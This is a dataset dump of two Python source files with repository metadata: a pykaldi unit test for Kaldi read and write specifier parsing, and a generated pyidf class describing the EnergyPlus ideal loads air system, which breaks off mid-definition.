|
d969d6d1011201357e53d5d89a9e21021ee88d33
| 6,202
|
py
|
Python
|
tests/util/kaldi-table-test.py
|
mxmpl/pykaldi
|
0570307138c5391cc47b019450d08bcb9686dd98
|
[
"Apache-2.0"
] | 916
|
2017-11-22T19:33:36.000Z
|
2022-03-31T11:51:58.000Z
|
tests/util/kaldi-table-test.py
|
mxmpl/pykaldi
|
0570307138c5391cc47b019450d08bcb9686dd98
|
[
"Apache-2.0"
] | 268
|
2018-01-16T22:06:45.000Z
|
2022-03-29T03:24:41.000Z
|
tests/util/kaldi-table-test.py
|
mxmpl/pykaldi
|
0570307138c5391cc47b019450d08bcb9686dd98
|
[
"Apache-2.0"
] | 260
|
2018-01-23T18:39:40.000Z
|
2022-03-24T08:17:39.000Z
|
from kaldi.util.table import *
import unittest
class TestKaldiTable(unittest.TestCase):
    """Tests for classify_wspecifier / classify_rspecifier string parsing."""

    def testClassifyWspecifier(self):
        """Write-specifier strings: ark/scp/both forms and the option flags."""
        a = "b,ark:foo|"
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("foo|", ark)
        self.assertEqual("", scp)
        self.assertTrue(opts.binary)
        a = "t,ark:foo|"
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("foo|", ark)
        self.assertEqual("", scp)
        self.assertFalse(opts.binary)
        a = "t,scp:a b c d"
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("", ark)
        self.assertEqual("a b c d", scp)
        self.assertFalse(opts.binary)
        a = "t,ark,scp:a b,c,d"
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
        self.assertEqual("a b", ark)
        self.assertEqual("c,d", scp)
        self.assertFalse(opts.binary)
        a = ""
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
        a = " t,ark:boo"  # leading space not allowed.
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
        a = " t,ark:boo"
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
        a = "t,ark:boo "  # trailing space not allowed.
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
        a = "b,ark,scp:,"  # empty ark, scp fnames valid.
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
        self.assertEqual("", ark)
        self.assertEqual("", scp)
        self.assertTrue(opts.binary)
        a = "f,b,ark,scp:,"  # empty ark, scp fnames valid.
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
        self.assertEqual("", ark)
        self.assertEqual("", scp)
        self.assertTrue(opts.binary)
        self.assertTrue(opts.flush)
        a = "nf,b,ark,scp:,"  # empty ark, scp fnames valid.
        ans, ark, scp, opts = classify_wspecifier(a)
        self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
        self.assertEqual("", ark)
        self.assertEqual("", scp)
        self.assertTrue(opts.binary)
        self.assertFalse(opts.flush)

    def testClassifyRspecifier(self):
        """Read-specifier strings: ark/scp forms, invalid combos, option flags."""
        a = "ark:foo|"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        a = "b,ark:foo|"  # b, is ignored
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        a = "ark,b:foo|"  # ,b is ignored
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        a = "scp,b:foo|"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        a = "scp,scp,b:foo|"  # invalid as repeated.
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
        self.assertEqual("", fname)
        a = "ark,scp,b:foo|"  # invalid as combined
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
        self.assertEqual("", fname)
        a = "scp,o:foo|"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        self.assertTrue(opts.once)
        a = "scp,no:foo|"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        self.assertFalse(opts.once)
        a = "s,scp,no:foo|"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        self.assertFalse(opts.once)
        self.assertTrue(opts.sorted)
        a = "scp:foo|"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("foo|", fname)
        a = "scp:"  # empty fname valid
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("", fname)
        a = ""
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
        a = "scp"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
        a = "ark"
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
        a = "ark:foo "  # trailing space not allowed
        ans, fname, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
        # Testing it accepts the meaningless t, and b, prefixes
        a = "b,scp:a"
        ans, b, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("a", b)
        a = "t,scp:a"
        ans, b, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
        self.assertEqual("a", b)
        a = "b,ark:a"
        ans, b, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("a", b)
        a = "t,ark:a"
        ans, b, opts = classify_rspecifier(a)
        self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
        self.assertEqual("a", b)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 35.44
| 63
| 0.623831
| 722
| 6,202
| 5.264543
| 0.096953
| 0.232833
| 0.126283
| 0.156275
| 0.900816
| 0.88161
| 0.879505
| 0.861352
| 0.843462
| 0.837674
| 0
| 0
| 0.253789
| 6,202
| 174
| 64
| 35.643678
| 0.821305
| 0.04821
| 0
| 0.726619
| 0
| 0
| 0.057206
| 0
| 0
| 0
| 0
| 0
| 0.517986
| 1
| 0.014388
| false
| 0
| 0.014388
| 0
| 0.035971
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d97d1240e2ddb27e9aea9777dc7f49f1aba9f862
| 436,763
|
py
|
Python
|
pyidf/zone_hvac_forced_air_units.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 19
|
2015-12-08T23:33:51.000Z
|
2022-01-31T04:41:10.000Z
|
pyidf/zone_hvac_forced_air_units.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 2
|
2019-10-04T10:57:00.000Z
|
2021-10-01T06:46:17.000Z
|
pyidf/zone_hvac_forced_air_units.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 7
|
2015-11-04T02:25:01.000Z
|
2021-12-08T03:14:28.000Z
|
""" Data objects in group "Zone HVAC Forced Air Units"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
# Library-style logging setup: expose a package-level logger and attach a
# NullHandler so applications that import pyidf without configuring logging
# don't get "No handler found" warnings.
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class ZoneHvacIdealLoadsAirSystem(DataObject):

    """ Corresponds to IDD object `ZoneHVAC:IdealLoadsAirSystem`
        Ideal system used to calculate loads without modeling a full HVAC system. All that is
        required for the ideal system are zone controls, zone equipment configurations, and
        the ideal loads system component. This component can be thought of as an ideal unit
        that mixes zone air with the specified amount of outdoor air and then adds or removes
        heat and moisture at 100% efficiency in order to meet the specified controls. Energy
        use is reported as DistrictHeating and DistrictCooling.
    """

    # NOTE(review): this class appears machine-generated from the EnergyPlus
    # IDD. `_schema` holds per-field metadata -- defaults, numeric limits
    # (the `minimum>`/`maximum<` keys denote strict bounds), units, and
    # accepted values -- presumably consumed by the DataObject base class for
    # validation and keyed field access; confirm against pyidf.helper.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'availability schedule name',
             {'name': u'Availability Schedule Name',
              'pyname': u'availability_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'zone supply air node name',
             {'name': u'Zone Supply Air Node Name',
              'pyname': u'zone_supply_air_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'zone exhaust air node name',
             {'name': u'Zone Exhaust Air Node Name',
              'pyname': u'zone_exhaust_air_node_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'maximum heating supply air temperature',
             {'name': u'Maximum Heating Supply Air Temperature',
              'pyname': u'maximum_heating_supply_air_temperature',
              'default': 50.0,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'maximum<': 100.0,
              'unit': u'C'}),
            (u'minimum cooling supply air temperature',
             {'name': u'Minimum Cooling Supply Air Temperature',
              'pyname': u'minimum_cooling_supply_air_temperature',
              'default': 13.0,
              'minimum>': -100.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'maximum<': 50.0,
              'unit': u'C'}),
            (u'maximum heating supply air humidity ratio',
             {'name': u'Maximum Heating Supply Air Humidity Ratio',
              'pyname': u'maximum_heating_supply_air_humidity_ratio',
              'default': 0.0156,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'kgWater/kgDryAir'}),
            (u'minimum cooling supply air humidity ratio',
             {'name': u'Minimum Cooling Supply Air Humidity Ratio',
              'pyname': u'minimum_cooling_supply_air_humidity_ratio',
              'default': 0.0077,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'kgWater/kgDryAir'}),
            (u'heating limit',
             {'name': u'Heating Limit',
              'pyname': u'heating_limit',
              'default': u'NoLimit',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'NoLimit',
                                  u'LimitFlowRate',
                                  u'LimitCapacity',
                                  u'LimitFlowRateAndCapacity'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'maximum heating air flow rate',
             {'name': u'Maximum Heating Air Flow Rate',
              'pyname': u'maximum_heating_air_flow_rate',
              'required-field': False,
              'autosizable': True,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'm3/s'}),
            (u'maximum sensible heating capacity',
             {'name': u'Maximum Sensible Heating Capacity',
              'pyname': u'maximum_sensible_heating_capacity',
              'required-field': False,
              'autosizable': True,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'W'}),
            (u'cooling limit',
             {'name': u'Cooling Limit',
              'pyname': u'cooling_limit',
              'default': u'NoLimit',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'NoLimit',
                                  u'LimitFlowRate',
                                  u'LimitCapacity',
                                  u'LimitFlowRateAndCapacity'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'maximum cooling air flow rate',
             {'name': u'Maximum Cooling Air Flow Rate',
              'pyname': u'maximum_cooling_air_flow_rate',
              'required-field': False,
              'autosizable': True,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'm3/s'}),
            (u'maximum total cooling capacity',
             {'name': u'Maximum Total Cooling Capacity',
              'pyname': u'maximum_total_cooling_capacity',
              'required-field': False,
              'autosizable': True,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'W'}),
            (u'heating availability schedule name',
             {'name': u'Heating Availability Schedule Name',
              'pyname': u'heating_availability_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'cooling availability schedule name',
             {'name': u'Cooling Availability Schedule Name',
              'pyname': u'cooling_availability_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'dehumidification control type',
             {'name': u'Dehumidification Control Type',
              'pyname': u'dehumidification_control_type',
              'default': u'ConstantSensibleHeatRatio',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'ConstantSensibleHeatRatio',
                                  u'Humidistat',
                                  u'None',
                                  u'ConstantSupplyHumidityRatio'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'cooling sensible heat ratio',
             {'name': u'Cooling Sensible Heat Ratio',
              'pyname': u'cooling_sensible_heat_ratio',
              'default': 0.7,
              'minimum>': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'dimensionless'}),
            (u'humidification control type',
             {'name': u'Humidification Control Type',
              'pyname': u'humidification_control_type',
              'default': u'None',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'None',
                                  u'Humidistat',
                                  u'ConstantSupplyHumidityRatio'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'design specification outdoor air object name',
             {'name': u'Design Specification Outdoor Air Object Name',
              'pyname': u'design_specification_outdoor_air_object_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'outdoor air inlet node name',
             {'name': u'Outdoor Air Inlet Node Name',
              'pyname': u'outdoor_air_inlet_node_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'demand controlled ventilation type',
             {'name': u'Demand Controlled Ventilation Type',
              'pyname': u'demand_controlled_ventilation_type',
              'default': u'None',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'None',
                                  u'OccupancySchedule',
                                  u'CO2Setpoint'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'outdoor air economizer type',
             {'name': u'Outdoor Air Economizer Type',
              'pyname': u'outdoor_air_economizer_type',
              'default': u'NoEconomizer',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'NoEconomizer',
                                  u'DifferentialDryBulb',
                                  u'DifferentialEnthalpy'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'heat recovery type',
             {'name': u'Heat Recovery Type',
              'pyname': u'heat_recovery_type',
              'default': u'None',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'None',
                                  u'Sensible',
                                  u'Enthalpy'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'sensible heat recovery effectiveness',
             {'name': u'Sensible Heat Recovery Effectiveness',
              'pyname': u'sensible_heat_recovery_effectiveness',
              'default': 0.7,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'dimensionless'}),
            (u'latent heat recovery effectiveness',
             {'name': u'Latent Heat Recovery Effectiveness',
              'pyname': u'latent_heat_recovery_effectiveness',
              'default': 0.65,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'dimensionless'}),
            (u'design specification zonehvac sizing object name',
             {'name': u'Design Specification ZoneHVAC Sizing Object Name',
              'pyname': u'design_specification_zonehvac_sizing_object_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'})]),
        'format': None,
        'group': u'Zone HVAC Forced Air Units',
        'min-fields': 26,
        'name': u'ZoneHVAC:IdealLoadsAirSystem',
        'pyname': u'ZoneHvacIdealLoadsAirSystem',
        'required-object': False,
        'unique-object': False}

    # Each property below reads/writes the field via `self[<IDD field name>]`;
    # the item protocol is provided by the DataObject base class.

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def availability_schedule_name(self):
        """field `Availability Schedule Name`

        |  Availability schedule name for this system. Schedule value > 0 means the system is available.
        |  If this field is blank, the system is always available.

        Args:
            value (str): value for IDD Field `Availability Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `availability_schedule_name` or None if not set

        """
        return self["Availability Schedule Name"]

    @availability_schedule_name.setter
    def availability_schedule_name(self, value=None):
        """Corresponds to IDD field `Availability Schedule Name`"""
        self["Availability Schedule Name"] = value

    @property
    def zone_supply_air_node_name(self):
        """field `Zone Supply Air Node Name`

        |  Must match a zone air inlet node name.

        Args:
            value (str): value for IDD Field `Zone Supply Air Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `zone_supply_air_node_name` or None if not set

        """
        return self["Zone Supply Air Node Name"]

    @zone_supply_air_node_name.setter
    def zone_supply_air_node_name(self, value=None):
        """Corresponds to IDD field `Zone Supply Air Node Name`"""
        self["Zone Supply Air Node Name"] = value

    @property
    def zone_exhaust_air_node_name(self):
        """field `Zone Exhaust Air Node Name`

        |  Should match a zone air exhaust node name.
        |  This field is optional, but is required if this object is
        |  used with other forced air equipment.

        Args:
            value (str): value for IDD Field `Zone Exhaust Air Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `zone_exhaust_air_node_name` or None if not set

        """
        return self["Zone Exhaust Air Node Name"]

    @zone_exhaust_air_node_name.setter
    def zone_exhaust_air_node_name(self, value=None):
        """Corresponds to IDD field `Zone Exhaust Air Node Name`"""
        self["Zone Exhaust Air Node Name"] = value

    @property
    def maximum_heating_supply_air_temperature(self):
        """field `Maximum Heating Supply Air Temperature`

        |  Units: C
        |  Default value: 50.0
        |  value < 100.0

        Args:
            value (float): value for IDD Field `Maximum Heating Supply Air Temperature`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `maximum_heating_supply_air_temperature` or None if not set

        """
        return self["Maximum Heating Supply Air Temperature"]

    @maximum_heating_supply_air_temperature.setter
    def maximum_heating_supply_air_temperature(self, value=50.0):
        """Corresponds to IDD field `Maximum Heating Supply Air Temperature`"""
        self["Maximum Heating Supply Air Temperature"] = value

    @property
    def minimum_cooling_supply_air_temperature(self):
        """field `Minimum Cooling Supply Air Temperature`

        |  Units: C
        |  Default value: 13.0
        |  value > -100.0
        |  value < 50.0

        Args:
            value (float): value for IDD Field `Minimum Cooling Supply Air Temperature`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `minimum_cooling_supply_air_temperature` or None if not set

        """
        return self["Minimum Cooling Supply Air Temperature"]

    @minimum_cooling_supply_air_temperature.setter
    def minimum_cooling_supply_air_temperature(self, value=13.0):
        """Corresponds to IDD field `Minimum Cooling Supply Air Temperature`"""
        self["Minimum Cooling Supply Air Temperature"] = value

    @property
    def maximum_heating_supply_air_humidity_ratio(self):
        """field `Maximum Heating Supply Air Humidity Ratio`

        |  Units: kgWater/kgDryAir
        |  Default value: 0.0156

        Args:
            value (float): value for IDD Field `Maximum Heating Supply Air Humidity Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `maximum_heating_supply_air_humidity_ratio` or None if not set

        """
        return self["Maximum Heating Supply Air Humidity Ratio"]

    @maximum_heating_supply_air_humidity_ratio.setter
    def maximum_heating_supply_air_humidity_ratio(self, value=0.0156):
        """Corresponds to IDD field `Maximum Heating Supply Air Humidity Ratio`"""
        self["Maximum Heating Supply Air Humidity Ratio"] = value

    @property
    def minimum_cooling_supply_air_humidity_ratio(self):
        """field `Minimum Cooling Supply Air Humidity Ratio`

        |  Units: kgWater/kgDryAir
        |  Default value: 0.0077

        Args:
            value (float): value for IDD Field `Minimum Cooling Supply Air Humidity Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `minimum_cooling_supply_air_humidity_ratio` or None if not set

        """
        return self["Minimum Cooling Supply Air Humidity Ratio"]

    @minimum_cooling_supply_air_humidity_ratio.setter
    def minimum_cooling_supply_air_humidity_ratio(self, value=0.0077):
        """Corresponds to IDD field `Minimum Cooling Supply Air Humidity Ratio`"""
        self["Minimum Cooling Supply Air Humidity Ratio"] = value

    @property
    def heating_limit(self):
        """field `Heating Limit`

        |  Default value: NoLimit

        Args:
            value (str): value for IDD Field `Heating Limit`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heating_limit` or None if not set

        """
        return self["Heating Limit"]

    @heating_limit.setter
    def heating_limit(self, value="NoLimit"):
        """Corresponds to IDD field `Heating Limit`"""
        self["Heating Limit"] = value

    @property
    def maximum_heating_air_flow_rate(self):
        """field `Maximum Heating Air Flow Rate`

        |  This field is ignored if Heating Limit = NoLimit
        |  If this field is blank, there is no limit.
        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Maximum Heating Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `maximum_heating_air_flow_rate` or None if not set

        """
        return self["Maximum Heating Air Flow Rate"]

    @maximum_heating_air_flow_rate.setter
    def maximum_heating_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Maximum Heating Air Flow Rate`"""
        self["Maximum Heating Air Flow Rate"] = value

    @property
    def maximum_sensible_heating_capacity(self):
        """field `Maximum Sensible Heating Capacity`

        |  This field is ignored if Heating Limit = NoLimit
        |  If this field is blank, there is no limit.
        |  Units: W

        Args:
            value (float or "Autosize"): value for IDD Field `Maximum Sensible Heating Capacity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `maximum_sensible_heating_capacity` or None if not set

        """
        return self["Maximum Sensible Heating Capacity"]

    @maximum_sensible_heating_capacity.setter
    def maximum_sensible_heating_capacity(self, value=None):
        """Corresponds to IDD field `Maximum Sensible Heating Capacity`"""
        self["Maximum Sensible Heating Capacity"] = value

    @property
    def cooling_limit(self):
        """field `Cooling Limit`

        |  Default value: NoLimit

        Args:
            value (str): value for IDD Field `Cooling Limit`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `cooling_limit` or None if not set

        """
        return self["Cooling Limit"]

    @cooling_limit.setter
    def cooling_limit(self, value="NoLimit"):
        """Corresponds to IDD field `Cooling Limit`"""
        self["Cooling Limit"] = value

    @property
    def maximum_cooling_air_flow_rate(self):
        """field `Maximum Cooling Air Flow Rate`

        |  This field is ignored if Cooling Limit = NoLimit
        |  This field is required if Outdoor Air Economizer Type is anything other than NoEconomizer.
        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Maximum Cooling Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `maximum_cooling_air_flow_rate` or None if not set

        """
        return self["Maximum Cooling Air Flow Rate"]

    @maximum_cooling_air_flow_rate.setter
    def maximum_cooling_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Maximum Cooling Air Flow Rate`"""
        self["Maximum Cooling Air Flow Rate"] = value

    @property
    def maximum_total_cooling_capacity(self):
        """field `Maximum Total Cooling Capacity`

        |  This field is ignored if Cooling Limit = NoLimit
        |  Units: W

        Args:
            value (float or "Autosize"): value for IDD Field `Maximum Total Cooling Capacity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `maximum_total_cooling_capacity` or None if not set

        """
        return self["Maximum Total Cooling Capacity"]

    @maximum_total_cooling_capacity.setter
    def maximum_total_cooling_capacity(self, value=None):
        """Corresponds to IDD field `Maximum Total Cooling Capacity`"""
        self["Maximum Total Cooling Capacity"] = value

    @property
    def heating_availability_schedule_name(self):
        """field `Heating Availability Schedule Name`

        |  If blank, heating is always available.

        Args:
            value (str): value for IDD Field `Heating Availability Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heating_availability_schedule_name` or None if not set

        """
        return self["Heating Availability Schedule Name"]

    @heating_availability_schedule_name.setter
    def heating_availability_schedule_name(self, value=None):
        """Corresponds to IDD field `Heating Availability Schedule Name`"""
        self["Heating Availability Schedule Name"] = value

    @property
    def cooling_availability_schedule_name(self):
        """field `Cooling Availability Schedule Name`

        |  If blank, cooling is always available.

        Args:
            value (str): value for IDD Field `Cooling Availability Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `cooling_availability_schedule_name` or None if not set

        """
        return self["Cooling Availability Schedule Name"]

    @cooling_availability_schedule_name.setter
    def cooling_availability_schedule_name(self, value=None):
        """Corresponds to IDD field `Cooling Availability Schedule Name`"""
        self["Cooling Availability Schedule Name"] = value

    @property
    def dehumidification_control_type(self):
        """field `Dehumidification Control Type`

        |  ConstantSensibleHeatRatio means that the ideal loads system
        |  will be controlled to meet the sensible cooling load, and the
        |  latent cooling rate will be computed using a constant
        |  sensible heat ratio (SHR)
        |  Humidistat means that there is a ZoneControl:Humidistat for this
        |  zone and the ideal loads system will attempt to satisfy the humidistat.
        |  None means that there is no dehumidification.
        |  ConstantSupplyHumidityRatio means that during cooling the supply air
        |  will always be at the Minimum Cooling Supply Humidity Ratio.
        |  Default value: ConstantSensibleHeatRatio

        Args:
            value (str): value for IDD Field `Dehumidification Control Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `dehumidification_control_type` or None if not set

        """
        return self["Dehumidification Control Type"]

    @dehumidification_control_type.setter
    def dehumidification_control_type(self, value="ConstantSensibleHeatRatio"):
        """Corresponds to IDD field `Dehumidification Control Type`"""
        self["Dehumidification Control Type"] = value

    @property
    def cooling_sensible_heat_ratio(self):
        """field `Cooling Sensible Heat Ratio`

        |  This field is applicable only when Dehumidification Control Type is ConstantSensibleHeatRatio
        |  Units: dimensionless
        |  Default value: 0.7
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Cooling Sensible Heat Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `cooling_sensible_heat_ratio` or None if not set

        """
        return self["Cooling Sensible Heat Ratio"]

    @cooling_sensible_heat_ratio.setter
    def cooling_sensible_heat_ratio(self, value=0.7):
        """Corresponds to IDD field `Cooling Sensible Heat Ratio`"""
        self["Cooling Sensible Heat Ratio"] = value

    @property
    def humidification_control_type(self):
        """field `Humidification Control Type`

        |  None means that there is no humidification.
        |  Humidistat means that there is a ZoneControl:Humidistat for this
        |  zone and the ideal loads system will attempt to satisfy the humidistat.
        |  ConstantSupplyHumidityRatio means that during heating the supply air
        |  will always be at the Maximum Heating Supply Humidity Ratio.
        |  Default value: None

        Args:
            value (str): value for IDD Field `Humidification Control Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `humidification_control_type` or None if not set

        """
        return self["Humidification Control Type"]

    @humidification_control_type.setter
    def humidification_control_type(self, value="None"):
        """Corresponds to IDD field `Humidification Control Type`"""
        self["Humidification Control Type"] = value

    @property
    def design_specification_outdoor_air_object_name(self):
        """field `Design Specification Outdoor Air Object Name`

        |  When the name of a DesignSpecification:OutdoorAir object is entered, the minimum
        |  outdoor air flow rate will be computed using these specifications. The outdoor air
        |  flow rate will also be affected by the next two fields.
        |  If this field is blank, there will be no outdoor air and the remaining fields will
        |  be ignored.

        Args:
            value (str): value for IDD Field `Design Specification Outdoor Air Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `design_specification_outdoor_air_object_name` or None if not set

        """
        return self["Design Specification Outdoor Air Object Name"]

    @design_specification_outdoor_air_object_name.setter
    def design_specification_outdoor_air_object_name(self, value=None):
        """Corresponds to IDD field `Design Specification Outdoor Air Object Name`"""
        self["Design Specification Outdoor Air Object Name"] = value

    @property
    def outdoor_air_inlet_node_name(self):
        """field `Outdoor Air Inlet Node Name`

        |  This field is required if the system provides outdoor air
        |  Enter the name of an outdoor air node. This node name is also specified in
        |  an OutdoorAir:Node or OutdoorAir:NodeList object.

        Args:
            value (str): value for IDD Field `Outdoor Air Inlet Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outdoor_air_inlet_node_name` or None if not set

        """
        return self["Outdoor Air Inlet Node Name"]

    @outdoor_air_inlet_node_name.setter
    def outdoor_air_inlet_node_name(self, value=None):
